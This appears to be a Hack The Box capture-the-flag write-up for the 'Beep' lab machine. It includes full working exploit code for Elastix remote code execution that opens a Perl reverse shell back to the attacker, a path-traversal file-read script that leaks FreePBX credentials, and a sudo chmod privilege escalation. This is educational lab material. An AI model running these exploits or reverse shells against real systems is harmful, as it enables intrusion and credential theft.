# Beep - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Beep was a nice easy-rated HTB machine created by [ch4p](https://app.hackthebox.com/users/1)

For user, we exploit a remote code execution in `elastix`  
We can use `chmod` or other utilities in `sudoers` for root.  
Alternatively, we could exploit a local file read vulnerability in `elastix` to get a password which is reused for root.  
On a side note, the website in this box uses TLS 1.0, and it was fun manoeuvring the issues caused by that.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.089s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
880/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt
```

```console
opcode@parrot$ nmap -sC -sV -p 22,25,80,110,111,143,443,880,993,995,3306,4190,4445,4559,5038,10000 -oN beep.nmap 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.090s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.10.10.7/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP USER STLS UIDL PIPELINING EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES AUTH-RESP-CODE APOP LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            877/udp   status
|_  100024  1            880/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: RIGHTS=kxte ACL UNSELECT OK ID URLAUTHA0001 IDLE CHILDREN STARTTLS MAILBOX-REFERRALS RENAME ATOMIC LIST-SUBSCRIBED BINARY IMAP4rev1 LISTEXT X-NETSCAPE CONDSTORE IMAP4 UIDPLUS NAMESPACE SORT=MODSEQ ANNOTATEMORE NO THREAD=REFERENCES THREAD=ORDEREDSUBJECT CATENATE SORT MULTIAPPEND QUOTA LITERAL+ Completed
443/tcp   open  ssl/https?
|_ssl-date: 2023-07-20T15:10:54+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -1s
```

Way too many ports and services are exposed.  
I'd start with the HTTPS port (443) as the HTTP port (80) redirects there.

When we try to visit <https://10.10.10.7/>, we will get an error.  
This box is so old that it is using TLS 1.0  
We can work around it by visiting `about:config` in Firefox and setting `security.tls.version.enable-deprecated` to `true`

The home page:

![1](images/1.png)

It's running `elastix`. I couldn't get default credentials to work.  
There are a bunch of exploits at <https://www.exploit-db.com/>, but I could not figure out the version of running elastix.

## Remote Code Execution approach

I tried to go with the RCE one: <https://www.exploit-db.com/exploits/18650>

I think the exploit script was written for `python2`.  
Even after making it `python3` compatible, it still fails to work due to the TLS 1.0 issue.  
To get around that, I had to make raw HTTPS requests with `PROTOCOL_TLSv1`:

```py
def get_request(host, path):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.set_ciphers('ALL:@SECLEVEL=1')

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s_sock = context.wrap_socket(s, server_hostname=host)
    s_sock.connect((host, 443))

    crlf = b"\r\n"
    method = b"GET"
    path = path.encode()
    protocol = b"HTTP/1.1"
    host_header = b"Host:" + host.encode()

    s_sock.send(method + b" " + path + b" " + protocol + crlf + host_header + crlf + crlf)

    response = b""
    while True:
        data = s_sock.recv(4096)
        if not data:
            break
        response += data

    # resp_header, resp_body = response.split(b"\r\n\r\n")
    return response.decode()
```

It still didn't give us a shell because we didn't have the correct extension.  
Well, we can just brute-force all extensions up to 1000.

Here is the final [exploit](exploit.py):

```py
import socket
import ssl
import sys
from struct import pack
from fcntl import ioctl
from textwrap import dedent
from urllib.parse import quote_plus
from concurrent.futures import ThreadPoolExecutor


def get_tun_ip():
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack("256s", b"tun0"))[20:24]

    return socket.inet_ntoa(packed_addr)


def do_get(host, path):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.set_ciphers("ALL:@SECLEVEL=1")

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s_sock = context.wrap_socket(s, server_hostname=host)
    s_sock.settimeout(1)
    s_sock.connect((host, 443))

    crlf = b"\r\n"
    method = b"GET"
    path = path.encode()
    protocol = b"HTTP/1.1"
    host_header = b"Host:" + host.encode()

    s_sock.send(
        method + b" " + path + b" " + protocol + crlf + host_header + crlf + crlf
    )

    response = b""
    while True:
        data = s_sock.recv(4096)
        if not data:
            break
        response += data

    # resp_header, resp_body = response.split(b"\r\n\r\n")
    return response.decode()


def attempt_rce(rhost, lhost, lport, extension):
    path = f"/recordings/misc/callme_page.php?action=c&callmenum={extension}"

    payload = dedent(
        f"""\
        @from-internal/n
        Application: system
        Data: perl -MIO -e '\
            $p=fork;exit,if($p);\
            $c=new IO::Socket::INET(PeerAddr,"{lhost}:{lport}");\
            STDIN->fdopen($c,r);\
            $~->fdopen($c,w);\
            system$_ while<>;'
        """
    ).encode()

    try:
        do_get(rhost, path + quote_plus(payload))
    except socket.timeout:
        pass


if __name__ == "__main__":
    lhost = get_tun_ip()
    lport = "9001"

    if len(sys.argv) != 2:
        print(f"[-] Usage: python3 {sys.argv[0]} <host>")
        print(f"[-] Example: python3 {sys.argv[0]} 10.10.10.7\n")
        sys.exit()

    rhost = sys.argv[1]

    with ThreadPoolExecutor(max_workers=20) as executor:
        futures = [
            executor.submit(attempt_rce, rhost, lhost, lport, extension)
            for extension in range(1000)
        ]
```

Now, we can start a listener in another terminal:

```console
opcode@parrot$ nc -lnvp 9001
listening on [any] 9001 ...
```

And then, we can start the exploit:

```console
opcode@parrot$ python3 exploit.py
```

After ~ 1 minute, we'd get a shell.  
We need to stabilize this shell. There's only `python2` available on the box.

```console
python -c 'import pty;pty.spawn("/bin/bash");'
bash-3.2$ ^Z
opcode@parrot$ stty raw -echo; fg
bash-3.2$ export TERM=xterm-256color
bash-3.2$ exec /bin/bash
```

## Privesc with `chmod`

```console
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
```

Most of them can be used for privilege escalation, but `/bin/chmod` should be the easiest.

```console
bash-3.2$ sudo chmod u+s /bin/bash
bash-3.2$ ls -la /bin/bash
-rwsr-xr-x 1 root root 735004 Jan 22  2009 /bin/bash
```

Now, we can run bash with -p to not drop the effective user id and get root:

```console
bash-3.2$ bash -p
bash-3.2# id
uid=100(asterisk) gid=101(asterisk) euid=0(root)
```

## Local File Read approach

Contrary to my approach, the guided mode takes another alternate approach.  
For this one, we need to exploit a Local File Read: <https://www.exploit-db.com/exploits/37637>

`curl` doesn't work because of the SSL 1.0 issue, but we can repurpose the previous script to read files:

```py
import socket
import ssl
import sys


def do_get(host, path):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.set_ciphers("ALL:@SECLEVEL=1")

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s_sock = context.wrap_socket(s, server_hostname=host)
    s_sock.settimeout(1)
    s_sock.connect((host, 443))

    crlf = b"\r\n"
    method = b"GET"
    path = path.encode()
    protocol = b"HTTP/1.1"
    host_header = b"Host:" + host.encode()

    s_sock.send(
        method + b" " + path + b" " + protocol + crlf + host_header + crlf + crlf
    )

    response = b""
    while True:
        data = s_sock.recv(4096)
        if not data:
            break
        response += data

    # resp_header, resp_body = response.split(b"\r\n\r\n")
    return response.decode()


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"[-] Usage: python3 {sys.argv[0]} <host> <file path>")
        print(f"[-] Example: python3 {sys.argv[0]} 10.10.10.7 /etc/hosts\n")
        sys.exit()

    host = sys.argv[1]
    file = sys.argv[2]
    path = f'/vtigercrm/graph.php?current_language=../../../../../../../../{file}%00&module=Accounts&action'
    data = do_get(host, path)
    print(data)
```

We can use it to read files:

```console
opcode@parrot$ python3 read_file.py 10.10.10.7 /etc/hosts
HTTP/1.1 200 OK
Date: Sat, 22 Jul 2023 05:08:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 243
Connection: close
Content-Type: text/html; charset=UTF-8

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1   localhost   beep localhost.localdomain localhost
::1     localhost6.localdomain6 localhost6
Sorry! Attempt to access restricted file.
```

It suggests us to look at the configuration file for FreePBX:

```console
opcode@parrot$ python3 read_file.py 10.10.10.7 /etc/amportal.conf | grep -v ^'#' | grep '\S'
HTTP/1.1 200 OK
Date: Sat, 22 Jul 2023 05:15:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2261
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
AMPADMINLOGO=logo.png
AMPEXTENSIONS=extensions
ENABLECW=no
1372
y FreePBX.
ZAP2DAHDICOMPAT=true
MOHDIR=mohmp3
AMPMODULEXML=http://mirror.freepbx.org/
AMPMODULESVN=http://mirror.freepbx.org/modules/
AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.
0
```

Here, we have the password `jEhdIekWmdjE`  
It is reused for root:

```console
opcode@parrot$ sshpass -p 'jEhdIekWmdjE' ssh -o StrictHostKeyChecking=no root@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
```

Googling the error, we can find a way to connect:

```console
opcode@parrot$ sshpass -p 'jEhdIekWmdjE' ssh -o StrictHostKeyChecking=no -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
```

It gives us a shell as root:

```console
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```
